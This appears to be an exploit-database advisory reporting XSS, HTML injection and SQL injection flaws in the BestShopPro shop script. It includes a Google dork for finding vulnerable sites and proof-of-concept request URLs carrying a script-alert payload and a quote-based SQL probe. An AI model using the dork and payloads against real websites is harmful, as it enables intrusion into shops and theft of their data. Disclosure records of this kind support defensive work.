BST - BestShopPro (nowosci.php) Multiple Vulnerabilities

vendor:

BestShopPro

by:

CoBRa_21

8.8

CVSS

HIGH

XSS, HTML, SQL Injection

79, 89, 89

CWE

Product Name: BestShopPro

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

BST – BestShopPro (nowosci.php) Multiple Vulnerabilities

The vulnerability exists in the nowosci.php page, which allows an attacker to inject malicious JavaScript code, HTML code, and SQL queries. An attacker can exploit this vulnerability by sending a crafted HTTP request containing malicious code to the vulnerable page.

Mitigation:

Input validation should be used to prevent malicious code from being injected into the vulnerable page.

Source

Exploit-DB raw data:

################################################################################################
#  Exploit Title: BST - BestShopPro (nowosci.php) Multiple Vulnerabilities
#
#  Author : CoBRa_21 
#
#  E-Mail : uyku_cu [at] windowslive.com
#
#  Google Dork : "Powered By BST"
#
#  Script Page : http://www.bst.pl
################################################################################################
#
#  XSS:
#
#  http://127.0.0.1/nowosci.php?a=1&str=<script>alert(/CoBRa_21/)</script>
#
#  HTML:
#
#  http://127.0.0.1/nowosci.php?a=1&str=<font color=red size=15>CoBRa_21</font>
#
#  SQL :
#
#  http://127.0.0.1/pokaz_podkat.php?idkat=10&order1=1&str=' (SQL)
#
################################################################################################